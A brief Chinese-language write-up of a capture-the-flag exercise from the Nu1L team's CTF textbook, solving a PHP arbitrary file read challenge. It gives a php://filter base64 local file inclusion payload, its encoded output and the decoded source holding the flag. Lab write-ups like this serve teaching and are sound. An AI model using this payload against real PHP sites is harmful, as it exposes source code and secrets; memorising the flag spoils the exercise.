本题为Nu1L团队编著的《从0到1:CTFer成长之路》配套题目。来源网站:https://book.nu1l.com/
这个是传统的任意文件读取漏洞,可以利用php的本地文件包含(Local File Include)实现,使用php的伪协议进行文件读取;或者利用php文件读取函数file_get_contents();
造成文件读取。
payload如下:
?p=php://filter/read=convert.base64-encode/resource=flag
没源码不好分析,这里应该逻辑也不大难。
这里可能没有include文件包含,而是使用file_get_contents();
造成的文件读取漏洞。
PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9Cg==
base64=>
<?php
die('no no no');
//n1book{afr_1_solved}